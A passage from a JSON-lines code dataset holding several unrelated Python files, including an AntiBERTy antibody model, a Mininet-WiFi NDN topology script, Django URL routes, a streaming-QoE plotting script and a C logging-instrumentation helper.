\"\"\"将中心下发的任务转换为自有的通用任务结构Task体枚举(一个文件可能有多个任务段)\"\"\"\n try:\n if data.stream is None or not data.stream.readable():\n self._logger.error(\n \"Data stream is None when trying to convert to standard Task: %s\"\n % data._source)\n return\n\n for dicseg in self._get_segments(data):\n if dicseg is None or len(dicseg._fields) < 1:\n continue\n try:\n # 创建任务对象\n\n task: IscoutTask = IscoutTask.create_from_dict(\n dicseg._fields, data._platform)\n\n task.segindex = dicseg.segindex\n task.segline = dicseg.segline\n\n if task is None or not isinstance(task, IscoutTask):\n self._logger.error(\"Parse IscoutTask failed.\")\n continue\n\n yield task\n\n except Exception:\n self._logger.error(\n \"Generate IscoutTask from dic fields error:\\ndata:%s\\nex:%s\"\n % (data._source, traceback.format_exc()))\n if not data is None:\n data.on_complete(False)\n\n except Exception:\n self._logger.error(\n \"Convert data to IscoutTask error:\\ndata:%s\\nex:%s\" %\n (data._source, traceback.format_exc()))\n if not data is None:\n data.on_complete(False)\n","repo_name":"Octoberr/sspywork","sub_path":"savecode/threeyears/idownserver/stdconvertmanagement/converteriscouttask.py","file_name":"converteriscouttask.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"70739258925","text":"\n#!/usr/bin/python\n# -*- Coding: utf-8 -*-\n\nfrom models2 import Queue, Node\n\ndef enqueue(queue):\n\tif log[5] != '40':\n\t\tqueue.enqueue_tcp()\n\telif log[4] == 'ack':\n\t\tqueue.enqueue_ack()\n\telif log[4] == 'tcp':\n\t\tqueue.enqueue_tcp40()\n\ndef dequeue(queue):\n\tif log[5] != '40':\n\t\tqueue.dequeue_tcp()\n\telif log[4] == 'ack':\n\t\tqueue.dequeue_ack()\n\telif log[4] == 'tcp':\n\t\tqueue.dequeue_tcp40()\n\ndef receive(node):\n\tif log[5] != '40':\n\t\tnode.receive_tcp(int(log[5]))\n\telif log[4] == 'ack':\n\t\tnode.receive_ack()\n\telif log[4] == 'tcp':\n\t\tnode.receive_tcp40()\n\ndef drop(node):\n\tif log[5] != '40':\n\t\tnode.drop_tcp(int(log[5]))\n\telif log[4] == 'ack':\n\t\tnode.drop_ack()\n\telif log[4] == 'tcp':\n\t\tnode.drop_tcp40()\n\nif __name__=='__main__':\n\tlink_a = Queue('link_a')\n\tlink_b = Queue('link_b')\n\tlink_c = Queue('link_c')\n\tnode0 = Node('node0')\n\tnode1 = Node('node1')\n\tnode2 = Node('node2')\n\tnode3 = Node('node3')\n\tstart_time = 0\n\tend_time = 0\n\n\tline = raw_input()\n\tstart_time = line.split()[1]\n\twhile line:\n\t\tlog = line.split()\n\t\tend_time = log[1]\n\t\tif log[0] == '+':\n\t\t\tif int(log[2]) + int(log[3]) == 1:\n\t\t\t\tenqueue(link_a)\n\t\t\telif int(log[2]) + int(log[3]) == 3:\n\t\t\t\tenqueue(link_b)\n\t\t\telif int(log[2]) + int(log[3]) == 5:\n\t\t\t\tenqueue(link_c)\n\n\t\tif log[0] == '-':\n\t\t\tif int(log[2]) + int(log[3]) == 1:\n\t\t\t\tdequeue(link_a)\n\t\t\telif int(log[2]) + int(log[3]) == 3:\n\t\t\t\tdequeue(link_b)\n\t\t\telif int(log[2]) + int(log[3]) == 5:\n\t\t\t\tdequeue(link_c)\n\n\t\tif log[0] == 'r':\n\t\t\tif log[3] == '0':\n\t\t\t\treceive(node0)\n\t\t\telif log[3] == '1':\n\t\t\t\treceive(node1)\n\t\t\telif log[3] == '2':\n\t\t\t\treceive(node2)\n\t\t\telif log[3] == '3':\n\t\t\t\treceive(node3)\n\n\t\tif log[0] == 'd':\n\t\t\tif log[2] == '0':\n\t\t\t\tdrop(node0)\n\t\t\telif log[2] == '1':\n\t\t\t\tdrop(node1)\n\t\t\telif log[2] == '2':\n\t\t\t\tdrop(node2)\n\t\t\telif log[2] == '3':\n\t\t\t\tdrop(node3)\n\t\ttry:\n\t\t\tline = raw_input()\n\t\texcept EOFError:\n\t\t\tbreak\n\n\tthrough_put = node3.get_packet() * 8 / (float(end_time) - float(start_time))\n\tprint(' - - - - - - - - - - - - - - - - - ')\n\tprint('start_time = ' + start_time)\n\tprint('end_time = ' + end_time)\n\tprint('time = ' + str(float(end_time) - float(start_time)))\n\tprint(' - - - - - - - - - - - - - - - - - ')\n\tnode0.print_result()\n\tprint(' - - - - - - - - - - - - - - - - - ')\n\tlink_a.print_result()\n\tprint(' - - - - - - - - - - - - - - - - - ')\n\tnode1.print_result()\n\tprint(' - - - - - - - - - - - - - - - - - ')\n\tlink_b.print_result()\n\tprint(' - - - - - - - - - - - - - - - - - ')\n\tnode2.print_result()\n\tprint(' - - - - - - - - - - - - - - - - - ')\n\tlink_c.print_result()\n\tprint(' - - - - - - - - - - - - - - - - - ')\n\tnode3.print_result()\n\tprint(' - - - - - - - - - - - - - - - - - ')\n\tprint(node3.name + '.get_packet(bit) = ' + str(node3.get_packet() * 8))\n\tprint('through put = '+ str(through_put))\n\tprint(' - - - - - - - - - - - - - - - - - ')\n","repo_name":"yuucu/ad-network","sub_path":"kadai2/main_kadai2.py","file_name":"main_kadai2.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70783391404","text":"from dataclasses import dataclass\nfrom typing import Optional, Tuple\nimport torch\nfrom torch import nn\nfrom transformers.models.bert.modeling_bert import BertPreTrainedModel, BertModel, BertLMPredictionHead, ModelOutput\n\nfrom antiberty.utils.general import exists\n\n\nclass AntiBERTyHeads(nn.Module):\n \"\"\"\n Classification heads for AntiBERTy model.\n \"\"\"\n def __init__(self, config):\n super().__init__()\n self.predictions = BertLMPredictionHead(config)\n self.species = nn.Linear(config.hidden_size, 6)\n self.chain = nn.Linear(config.hidden_size, 2)\n self.graft = nn.Linear(config.hidden_size, 2)\n\n def forward(self, sequence_output, pooled_output):\n prediction_scores = self.predictions(sequence_output)\n species_score = self.species(pooled_output)\n chain_score = self.chain(pooled_output)\n graft_score = self.graft(pooled_output)\n return prediction_scores, species_score, chain_score, graft_score\n\n\n@dataclass\nclass AntiBERTyOutput(ModelOutput):\n \"\"\"\n Output type of for AntiBERTy model.\n \"\"\"\n\n loss: Optional[torch.FloatTensor] = None\n prediction_logits: torch.FloatTensor = None\n species_logits: torch.FloatTensor = None\n chain_logits: torch.FloatTensor = None\n graft_logits: torch.FloatTensor = None\n hidden_states: Optional[Tuple[torch.FloatTensor]] = None\n attentions: Optional[Tuple[torch.FloatTensor]] = None\n\n\nclass AntiBERTy(BertPreTrainedModel):\n \"\"\"\n BERT model for antibody sequences, with classification heads\n for species, chain type, and presence of grafting\n \"\"\"\n def __init__(self, config):\n super().__init__(config)\n\n self.bert = BertModel(config)\n self.cls = AntiBERTyHeads(config)\n\n self.init_weights()\n\n self.num_species = 6\n self.num_chains = 2\n self.num_grafts = 2\n\n def get_output_embeddings(self):\n return self.cls.predictions.decoder\n\n def set_output_embeddings(self, new_embeddings):\n self.cls.predictions.decoder = new_embeddings\n\n def forward(\n self,\n input_ids,\n attention_mask=None,\n token_type_ids=None,\n position_ids=None,\n head_mask=None,\n inputs_embeds=None,\n labels=None,\n species_label=None,\n chain_label=None,\n graft_label=None,\n output_attentions=None,\n output_hidden_states=None,\n return_dict=None,\n ):\n return_dict = return_dict if exists(\n return_dict) else self.config.use_return_dict\n\n outputs = self.bert(\n input_ids,\n attention_mask=attention_mask,\n token_type_ids=token_type_ids,\n position_ids=position_ids,\n head_mask=head_mask,\n inputs_embeds=inputs_embeds,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n return_dict=return_dict,\n )\n\n sequence_output, pooled_output = outputs[:2]\n prediction_scores, species_score, chain_score, graft_score = self.cls(\n sequence_output, pooled_output)\n\n b = input_ids.shape[0]\n\n total_loss, masked_lm_loss, species_loss, chain_loss, graft_loss = None, None, None, None, None\n if exists(labels):\n mlm_loss_fct = nn.CrossEntropyLoss()\n masked_lm_loss = mlm_loss_fct(\n prediction_scores.view(-1, self.config.vocab_size),\n labels.view(-1))\n\n if exists(species_label):\n species_freqs = torch.bincount(species_label,\n minlength=self.num_species)\n species_weights = b / (species_freqs * self.num_species)\n species_loss_fct = nn.CrossEntropyLoss(weight=species_weights)\n species_loss = species_loss_fct(\n species_score.view(-1, self.num_species),\n species_label.view(-1))\n\n if exists(chain_label):\n chain_freqs = torch.bincount(chain_label,\n minlength=self.num_chains)\n species_weights = b / (chain_freqs * self.num_chains)\n chain_loss_fct = nn.CrossEntropyLoss(weight=species_weights)\n chain_loss = chain_loss_fct(chain_score.view(-1, 2),\n chain_label.view(-1))\n\n if exists(graft_label):\n graft_freqs = torch.bincount(graft_label,\n minlength=self.num_grafts)\n graft_weights = b / (graft_freqs * self.num_grafts)\n graft_loss_fct = nn.CrossEntropyLoss(weight=graft_weights)\n graft_loss = graft_loss_fct(graft_score.view(-1, 2),\n graft_label.view(-1))\n\n total_loss = \\\n masked_lm_loss if exists(masked_lm_loss) else 0 \\\n + species_loss if exists(species_loss) else 0 \\\n + chain_loss if exists(chain_loss) else 0 \\\n + graft_loss if exists(graft_loss) else 0\n\n if not return_dict:\n output = (prediction_scores, species_score, chain_score,\n graft_score) + outputs[2:]\n return ((total_loss, ) + output) if exists(total_loss) else output\n\n return AntiBERTyOutput(\n loss=total_loss,\n prediction_logits=prediction_scores,\n species_logits=species_score,\n chain_logits=chain_score,\n graft_logits=graft_score,\n hidden_states=outputs.hidden_states,\n attentions=outputs.attentions,\n )\n","repo_name":"jeffreyruffolo/AntiBERTy","sub_path":"antiberty/model/AntiBERTy.py","file_name":"AntiBERTy.py","file_ext":"py","file_size_in_byte":5586,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"19"} +{"seq_id":"40021817667","text":"#!/usr/bin/python\n\n'This example creates a simple network topology with 1 AP and 2 stations'\n\nimport sys\n\nfrom functools import partial\n\nfrom mininet.log import setLogLevel, info, debug\nfrom mininet.node import RemoteController\nfrom mn_wifi.node import Station\nfrom mn_wifi.cli import CLI\nfrom mn_wifi.net import Mininet_wifi\nimport configparser\n\nclass Link(object):\n\n def __init__(self, strNode1, strNode2, **kwargs):\n self.strNode1 = strNode1\n self.strNode2 = strNode2\n self.kwargs = kwargs\n\n def toString(self):\n strReturn = ' %s <-> %s : %s' % (self.strNode1, self.strNode2, ['%s: %s' % (str(x), str(y)) for x, y in self.kwargs.items()])\n return strReturn\n\nclass Node(object):\n\n def __init__(self, strName, **kwargs):\n self.strName = strName\n self.kwargs = kwargs\n\n def toString(self):\n strReturn = ' %s : %s' % (self.strName, ['%s: %s' % (str(x), str(y)) for x, y in self.kwargs.items()])\n return strReturn\n\nclass MyTopology(object):\n\n def __init__(self):\n self.lstStations = []\n self.lstAccessPoints = []\n self.lstLinks = []\n\n def addStation(self, strName, **kwargs):\n self.lstStations.append(Node(strName, **kwargs))\n\n def addAccessPoint(self, strName, **kwargs):\n self.lstAccessPoints.append(Node(strName, **kwargs))\n\n def addLink(self, strNode1, strNode2, **kwargs):\n self.lstLinks.append(Link(strNode1, strNode2, **kwargs))\n\n def toString(self):\n info('Stations (%d) ----------------\\n' % len(self.lstStations))\n for pStation in self.lstStations:\n info(pStation.toString() + '\\n')\n\n info('AccessPoints (%d) ----------------\\n' % len(self.lstAccessPoints))\n for pAp in self.lstAccessPoints:\n info(pAp.toString() + '\\n')\n \n info('Links (%d) ----------------\\n' % len(self.lstLinks))\n for pLink in self.lstLinks:\n info(pLink.toString() + '\\n')\n\ndef topology():\n\n privateDirs = [ ( '/var/log', '/tmp/%(name)s/var/log' ),\n ( '/var/run', '/tmp/%(name)s/var/run' ),\n ( '/run', '/tmp/%(name)s/run' ),\n '/var/mn' ]\n station = partial( Station,\n privateDirs=privateDirs )\n \"Create a network.\"\n net = Mininet_wifi(station=station)\n \n topo = processTopo(topoFile='/home/vagrant/icnsimulations/topologies/wifi-topo12-noloop.conf')\n topo.toString()\n\n # Add access points\n for topoAp in topo.lstAccessPoints:\n topoAp.kwargs['client_isolation'] = True\n net.addAccessPoint(topoAp.strName, protocols='OpenFlow13', ssid=\"simpletopo\" + str(topoAp.strName), mode=\"g\", channel=\"5\", **topoAp.kwargs)\n \n # Add stations\n for topoStation in topo.lstStations:\n net.addStation(topoStation.strName, **topoStation.kwargs)\n\n # Add controller\n c0 = net.addController('c0', controller=RemoteController, ip='127.0.0.1', port=6653)\n\n info(\"*** Configuring wifi nodes\\n\")\n net.configureWifiNodes()\n\n info(\"*** Associating Stations\\n\")\n for topoLink in topo.lstLinks:\n pNode1 = findNodeByName(topoLink.strNode1, net.aps + net.stations)\n pNode2 = findNodeByName(topoLink.strNode2, net.aps + net.stations)\n if (pNode1 is None) or (pNode2 is None):\n raise Exception('Could not find name in node list name1=%s name2=%s' % (topoLink.strNode1, topoLink.strNode2))\n else:\n net.addLink(pNode1, pNode2, **topoLink.kwargs)\n\n info(\"*** Starting network\\n\")\n net.build()\n c0.start()\n for pAp in net.aps:\n pAp.start([c0])\n\n # if '-v' not in sys.argv:\n # for pAp in net.aps:\n # info('Setting for ap=%s' % pAp.name)\n # pAp.cmd('ovs-ofctl add-flow ' + pAp.name + ' \"priority=0,arp,in_port=1,'\n # 'actions=output:in_port,normal\"')\n # pAp.cmd('ovs-ofctl add-flow ' + pAp.name + ' \"priority=0,icmp,in_port=1,'\n # 'actions=output:in_port,normal\"')\n # pAp.cmd('ovs-ofctl add-flow ' + pAp.name + ' \"priority=0,udp,in_port=1,'\n # 'actions=output:in_port,normal\"')\n # pAp.cmd('ovs-ofctl add-flow ' + pAp.name + ' \"priority=0,tcp,in_port=1,'\n # 'actions=output:in_port,normal\"')\n\n info(\"*** Starting NFD processes\\n\")\n lstNfdProcs = list()\n for pStation in net.stations:\n nfdProc = pStation.popen(\"nfd --config /usr/local/etc/ndn/nfd.conf.sample\")\n lstNfdProcs.append(nfdProc)\n\n info('Creating and registering faces\\n')\n for pStation in net.stations:\n for pStation2 in net.stations:\n if (pStation != pStation2):\n pStation.cmd(\"nfdc face create udp://\" + pStation2.IP())\n pStation.cmd('nfdc route add %s udp://%s' % (interestFilterForHost(pStation2.name), pStation2.IP()))\n\n info(\"*** Running CLI\\n\")\n CLI(net)\n\n info(\"*** Stopping NFD\\n\")\n for proc in lstNfdProcs:\n proc.kill()\n\n info(\"*** Stopping network\\n\")\n net.stop()\n\ndef processTopo(topoFile):\n config = configparser.ConfigParser(delimiters=' ')\n config.read(topoFile)\n topo = MyTopology()\n\n items = config.items('stations')\n debug(\"Stations\")\n for item in items:\n debug(item[0].split(':'))\n name = item[0].split(':')[0]\n params = {}\n for param in item[1].split(' '):\n if (param == \"_\"):\n continue\n key = param.split('=')[0]\n value = param.split('=')[1]\n if key in ['range']:\n value = int(value)\n params[key] = value\n topo.addStation(name, **params)\n\n try:\n debug(\"APs\")\n items = config.items('accessPoints')\n for item in items:\n debug(item[0].split(':'))\n name = item[0].split(':')[0]\n ap_params = {}\n for param in item[1].split(' '):\n if (param == \"_\"):\n continue\n key = param.split('=')[0]\n value = param.split('=')[1]\n if key in ['range']:\n value = int(value)\n ap_params[key] = value\n topo.addAccessPoint(name, **ap_params)\n except configparser.NoSectionError:\n debug(\"APs are optional\")\n pass\n\n items = config.items('links')\n debug(\"Links\")\n for item in items:\n link = item[0].split(':')\n debug(link)\n params = {}\n for param in item[1].split(' '):\n if param == \"_\":\n continue\n key = param.split('=')[0]\n value = param.split('=')[1]\n if key in ['bw', 'jitter', 'max_queue_size']:\n value = int(value)\n if key == 'loss':\n value = float(value)\n params[key] = value\n\n topo.addLink(link[0], link[1], **params)\n\n return topo\n\ndef interestFilterForHost(strHost):\n return '/%s' % strHost\n\ndef findNodeByName(strName, lstNodes):\n for pNode in lstNodes:\n if (str(pNode) == strName):\n return pNode\n return None\n\nif __name__ == '__main__':\n setLogLevel('info')\n topology()\n","repo_name":"andredxc/ICNSimulations","sub_path":"src/deprecated/complex-wifi.py","file_name":"complex-wifi.py","file_ext":"py","file_size_in_byte":6910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23562442126","text":"from django.urls import path\r\nfrom . import views\r\n\r\nurlpatterns = [\r\n path('', views.index, name='LandingPage'),\r\n path('about-us', views.aboutUs, name='About-Us'),\r\n path('testimonials', views.testimonials, name='Testimonials'),\r\n path('registration', views.register, name='Register'),\r\n\r\n path('driver', views.driverPage, name='driverPage'),\r\n path('driverIndex', views.driverIndex, name='driverIndex'),\r\n\r\n path('customer', views.customerPage, name='customerPage'),\r\n path('customerIndex', views.customerIndex, name='customerIndex'),\r\n\r\n path('farmer', views.farmerPage, name=\"farmerPage\"),\r\n path('farmerIndex', views.farmerIndex, name=\"farmerIndex\"),\r\n path('farmerInventory', views.farmerInventory, name=\"farmerInventory\"),\r\n\r\n path('profile', views.profilePage, name='ProfilePage'),\r\n path('cart', views.cartPage, name='CartPage'),\r\n path('product', views.productPage, name='ProductPage'),\r\n path('account', views.accountPage, name='AccountPage'),\r\n path('orders', views.ordersPage, name='orderPage'),\r\n path('requests', views.requestsPage, name='requestPage'),\r\n]\r\n","repo_name":"NilanchalaPanda/DEBUG-THUGS---FRESHWHEELS","sub_path":"login/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"817601742","text":"import argparse\nimport math\nimport matplotlib.pyplot as plt\nimport os\nimport numpy as np\nimport shutil\nimport pandas as pd\nimport seaborn as sns\n\nsns.set()\nsns.set_context(\"talk\")\n\nNUM_BINS = 100\npath = '../Data/Video_Info/Pensieve_Info/PenieveVideo_video_info'\n\nvideo_mappings = {}\nvideo_mappings['300'] = '320x180x30_vmaf_score' \nvideo_mappings['750'] = '640x360x30_vmaf_score'\nvideo_mappings['1200'] = '768x432x30_vmaf_score'\nvideo_mappings['1850'] = '1024x576x30_vmaf_score'\nvideo_mappings['2850'] = '1280x720x30_vmaf_score'\nvideo_mappings['4300'] = '1280x720x60_vmaf_score'\n\n\nmetric_list = [\"reward_vmaf\", \"reward_br\", \"rebuf\", \"br_avg\", \"vmaf_avg\", \"switching_vmaf\", \"switching_br\"]\n#MINERVA\nrebuf_penalty = 25\nswitching_penalty = 2.5\n\n\nsegment_lenght = 4.0\n\ndef load_csv():\n video_info = pd.read_csv(path)\n return video_info\n\npensieve_video_csv = load_csv()\n\ndef get_qoe(abr, trace):\n logdir = os.path.join(args.result_dir, abr + \"-\" + trace, \"result\")\n logfile = os.path.join(logdir, abr + \"_rewards_0.log\")\n \n reward_vmaf = 0\n reward_bitrate = 0\n total_rebuffering = 0.0\n vmaf_avg = 0.0\n vmaf_switching_avg = 0.0\n bitrate_avg = 0.0\n bitrate_switching_avg = 0.0\n\n with open(logfile, \"r\") as fin:\n reward_lines = fin.readlines()\n \n if (len(reward_lines) != args.video_chunks):\n if len(reward_lines) < args.video_chunks:\n to_clean.append(logfile)\n print(\"{} has {} chunks instead of {}\".format(logfile, len(reward_lines), args.video_chunks))\n print(\"Skip, please\")\n return None, None, None, None, None, None, None\n\n for i, r_line in enumerate(reward_lines):\n data = r_line.split()\n if i == 0:\n br = int(data[1])\n br_previous = br\n vmaf_previous = pensieve_video_csv.loc[i, video_mappings[str(br)]]\n else: # skip first\n br = int(data[1])\n bitrate_avg += br\n bitrate_switching_avg += abs(br - br_previous)\n reward_bitrate += float(data[-1])\n\n total_rebuffering += float(data[3])\n \n vmaf_current = pensieve_video_csv.loc[i, video_mappings[str(br)]]\n vmaf_avg += vmaf_current\n vmaf_switching_avg += abs(vmaf_current - vmaf_previous)\n\n reward_vmaf += (float(vmaf_current) - \n rebuf_penalty*(float(data[3])) - \n switching_penalty*(abs(vmaf_current - vmaf_previous)))\n \n vmaf_previous = vmaf_current\n br_previous = br\n\n return reward_vmaf,\\\n reward_bitrate,\\\n total_rebuffering,\\\n bitrate_switching_avg/(segment_lenght*args.video_chunks),\\\n vmaf_switching_avg/(segment_lenght*args.video_chunks),\\\n vmaf_avg/(segment_lenght*args.video_chunks),\\\n bitrate_avg/args.video_chunks\n\n#\n#def get_qoe(abr, trace):\n# logdir = os.path.join(args.result_dir, abr + \"-\" + trace, \"result\")\n# logfile = os.path.join(logdir, abr + \"_rewards_0.log\")\n# \n# reward = 0\n# \n#\n# with open(logfile, \"r\") as fin:\n# reward_lines = fin.readlines()\n# \n# if (len(reward_lines) != args.video_chunks):\n# if len(reward_lines) < args.video_chunks:\n# to_clean.append(logfile)\n# print(\"{} has {} chunks instead of {}\".format(logfile, len(reward_lines), args.video_chunks))\n# print(\"Skip, please\")\n# return None\n#\n# for i, r_line in enumerate(reward_lines):\n# if i > 0: # skip first\n# reward += float(r_line.split()[-1])\n# \n# return reward\n\ndef get_qoes(abrs_list, traces_list):\n \n global_results = {}\n for abr in abrs_list:\n global_results[abr] = []\n global_results[abr] = {}\n global_results[abr]['reward_vmaf'] = []\n global_results[abr]['reward_br'] = []\n global_results[abr]['rebuf'] = []\n global_results[abr]['switching_br'] = []\n global_results[abr]['switching_vmaf'] = []\n global_results[abr]['vmaf_avg'] = []\n global_results[abr]['br_avg'] = []\n\n for trace in traces_list:\n reward_vmaf, reward_br, rebuf, switching_br, switching_vmaf, vmaf_avg, br_avg = get_qoe(abr, trace)\n if reward_vmaf is not None:\n global_results[abr]['reward_vmaf'].append(reward_vmaf)\n global_results[abr]['reward_br'].append(reward_br)\n global_results[abr]['rebuf'].append(rebuf)\n global_results[abr]['switching_br'].append(switching_br)\n global_results[abr]['switching_vmaf'].append(switching_vmaf)\n global_results[abr]['vmaf_avg'].append(vmaf_avg)\n global_results[abr]['br_avg'].append(br_avg)\n\n return global_results\n\ndef get_qoes_partial(abrs_list, traces_list):\n \n total_experiments_expected = len(args.abrs) * len(args.traces)\n \n experiments_executed_so_far = 0\n partial_results = {}\n \n for abr in abrs_list:\n \n partial_results[abr] = {}\n partial_results[abr]['reward_vmaf'] = []\n partial_results[abr]['reward_br'] = []\n partial_results[abr]['rebuf'] = []\n partial_results[abr]['switching_br'] = []\n partial_results[abr]['switching_vmaf'] = []\n partial_results[abr]['vmaf_avg'] = []\n partial_results[abr]['br_avg'] = []\n\n\n for trace in traces_list:\n \n logdir = os.path.join(args.result_dir, abr + \"-\" + trace, \"result\")\n if os.path.exists(logdir):\n reward_vmaf, reward_br, rebuf, switching_br, switching_vmaf, vmaf_avg, br_avg = get_qoe(abr, trace)\n if reward_vmaf is not None:\n partial_results[abr]['reward_vmaf'].append(reward_vmaf)\n partial_results[abr]['reward_br'].append(reward_br)\n partial_results[abr]['rebuf'].append(rebuf)\n partial_results[abr]['switching_br'].append(switching_br)\n partial_results[abr]['switching_vmaf'].append(switching_vmaf)\n partial_results[abr]['vmaf_avg'].append(vmaf_avg)\n partial_results[abr]['br_avg'].append(br_avg)\n\n experiments_executed_so_far += 1\n if partial_results[abr] == []:\n del partial_results[abr]\n\n print(\"Experiment executed: {}/{}\".format(experiments_executed_so_far, total_experiments_expected))\n return partial_results\n\n\ndef plot_cdf(results, reward_key):\n \n fig = plt.figure(figsize=(16.0, 10.0))\n ax = fig.add_subplot(111)\n \n def average_of_the_best():\n avg_best = -1000000000000\n abr_best = ''\n for scheme in results.keys():\n avg_tmp = np.mean(results[scheme][reward_key])\n if avg_best < avg_tmp:\n avg_best = avg_tmp\n abr_best = scheme\n \n print(\"Best provider in average is {} with {}\".format(abr_best, avg_best))\n\n return abs(avg_best)\n\n schemes = []\n\n norm = average_of_the_best()\n\n markers = ['.', ',', 'o', 'v', '^', '>', '<', 's', 'x', 'D', 'd', '*', '_', '']\n\n for i, scheme in enumerate(results.keys()):\n values = [float(i)/norm for i in results[scheme][reward_key]]\n values, base = np.histogram(values, bins=len(values))\n cumulative = np.cumsum(values)\n cumulative = [float(i) / len(values) * 100 for i in cumulative]\n marker_index = i % len(markers)\n ax.plot(base[:-1], cumulative, linewidth=3, marker=markers[marker_index], markevery=2, markersize=15)\n schemes.append(scheme)\n\n ax.legend(schemes, loc=2)\n ax.set_xlim(-1.0, 1.8)\n plt.ylabel('CDF')\n plt.xlabel('total reward')\n fig.savefig(os.path.join(args.store_dir, 'cdf_{}.png'.format(reward_key)))\n\n\ndef plot_bar(results, metric):\n \n results_metric_avg = {}\n\n for scheme in results.keys():\n results_metric_avg[scheme] = np.mean(results[scheme][metric])\n\n fig = plt.figure(figsize=(16.0, 10.0))\n ax = fig.add_subplot(111)\n \n y_pos = np.arange(len(results_metric_avg.keys()))\n ax.bar(y_pos, results_metric_avg.values())\n ax.set_xticks(y_pos)\n ax.set_xticklabels(results_metric_avg.keys())\n fig.savefig(os.path.join(args.store_dir, 'bar_{}.png'.format(metric)))\n\n\ndef clean():\n timestamps = []\n for c in to_clean:\n timestamp_creation = os.path.getmtime(c)\n timestamps.append(timestamp_creation)\n print(\"File {} was created at {}\".format(c, timestamp_creation))\n \n timestamps.sort()\n if not args.include_last and len(timestamps) >= 1:\n print(\"Skipping file created at {}: might be still running\".format(timestamps[-1]))\n del timestamps[-1]\n\n \n removing = []\n\n for t in timestamps:\n for c in to_clean:\n if os.path.getmtime(c) == t:\n print(\"Removing {}\".format(os.path.dirname(os.path.dirname(c))))\n removing.append(os.path.dirname(os.path.dirname(c)))\n for r in removing:\n shutil.rmtree(r)\ndef main():\n \n \n # parse arguments\n parser = argparse.ArgumentParser()\n parser.add_argument('result_dir', help='result directory', type=str)\n parser.add_argument('store_dir', help='result directory', type=str)\n parser.add_argument('video_chunks', help='result directory', type=int)\n parser.add_argument(\"--abrs\", nargs=\"+\", help='ABR list')\n parser.add_argument(\"--traces\", nargs=\"+\", help='Traces list')\n parser.add_argument('--partial', action=\"store_true\", help=\"get the partial results\")\n parser.add_argument('--allow_cleaning', action=\"store_true\", help=\"if enabled, cleans the experiments that failed, a part of the most recent one (might still be running\")\n parser.add_argument('--include_last', action=\"store_true\", help=\"if enabled, also the last is getting cleaned\")\n\n # args need to be global for simplicity\n global args\n args = parser.parse_args()\n \n global to_clean\n to_clean = []\n\n if not os.path.exists(args.store_dir):\n os.makedirs(args.store_dir)\n\n if args.partial:\n res = get_qoes_partial(args.abrs, args.traces)\n else:\n res = get_qoes(args.abrs, args.traces)\n \n for metric in metric_list:\n if \"reward\" in metric:\n plot_cdf(res, metric)\n plot_bar(res, metric)\n \n if args.allow_cleaning:\n print(\"Executing cleaning\")\n clean()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"magruener/reconstructing-proprietary-video-streaming-algorithms","sub_path":"DashExperiments/make_plot.py","file_name":"make_plot.py","file_ext":"py","file_size_in_byte":10625,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"19"} +{"seq_id":"11161821887","text":"import re\nfrom os import listdir\nfrom os.path import isfile, join\n\nfile_start = \"#define FSTART(filename) {FILE* fp = fopen((filename),\\\"a\\\"); if (fp != NULL){fprintf(fp,\\\"\\\\nEntering \" \\\n \": [%s] at [%s:%d]\\\",__func__,__FILE__, __LINE__); fclose(fp);}} \"\nfile_end = \"#define FEND(filename) {FILE* fp = fopen((filename),\\\"a\\\"); if (fp != NULL){fprintf(fp,\\\"\\\\nLeaving : [\" \\\n \"%s] at [%s:%d]\\\",__func__,__FILE__, __LINE__); fclose(fp);}} \"\n\nfs = \"FSTART();\"\nfe = \"FEND();\"\n\n# fun pat\nPATold = r'[a-zA-Z_]+[0-9]*[\\s]+[a-zA-Z_]+[0-9]*[:]*[a-zA-Z_]+[0-9]*[\\s]*[\\(]+[a-zA-Z0-9_\\*&\\s\\.\\,]*[\\)][\\s]*[{]'\nPAT = r'[a-zA-Z_]+[0-9]*[\\s]+[a-zA-Z_]+[0-9]*[:]*[a-zA-Z_]+[0-9]*[\\s]*[\\(]+[a-zA-Z0-9_\\*&\\s\\.\\,]*[\\)][\\s]*[{]'\n\n\ndef processDir(path):\n onlyfiles = [f for f in listdir(path) if isfile(join(path, f))]\n for f in onlyfiles:\n if f.lower().endswith(\".c\") or f.lower().endswith(\".cpp\"):\n processFile(f)\n pass\n\n\ndef removePattern(text, patt):\n index = text.find(patt)\n if index == -1:\n return text\n else:\n return text[:index]\n\n\ndef processFile(filePath):\n print(\"Processing : \" + filePath)\n lines = []\n singleLine = \" \"\n debugList = []\n with open(filePath) as file:\n lines = file.readlines()\n # lines = [line.rstrip() for line in lines]\n for line in lines:\n singleLine = singleLine + line\n\n debugList.append(file_start)\n debugList.append(file_end)\n nf = file_start + \"\\n\" + file_end\n\n match = re.search(PAT, singleLine)\n temp = singleLine\n while match is not None:\n print('Start Index:', match.start())\n print('End Index:', match.end())\n print(temp[match.start():match.end()])\n piece = temp[match.start():match.end()]\n if piece.strip().startswith(\"#\") or piece.strip().startswith(\"//\") or piece.strip().startswith(\"/*\"):\n nf = nf + temp[:match.end()]\n temp = temp[match.end():]\n else:\n #nf = nf + temp[:match.end()] + \"\\n\" + fs + \"\\n\"\n bop = 1\n bi = match.end()\n while bop != 0:\n if temp[bi] == '{':\n bop = bop + 1\n elif temp[bi] == '}':\n bop = bop - 1\n bi = bi + 1\n\n body = temp[match.end():bi]\n nf = nf + temp[:match.end()] + \"\\n\" + fs + \"\\n\"\n voidRet = body.find(\"return\")\n while body.find(\"return \") != -1:\n si = body.find(\"return \")\n nf = nf + body[:si] + \"\\n\" + fe + \"\\n\" + \"return \"\n body = body[si + 7:]\n if voidRet == -1:\n print(body)\n body = body.rstrip()\n xlen = len(body)\n if body.endswith('}'):\n body = body[:xlen-1] + \"\\n\" + fe + \"\\n}\"\n nf = nf + body\n else:\n nf = nf + body\n #nf = nf + 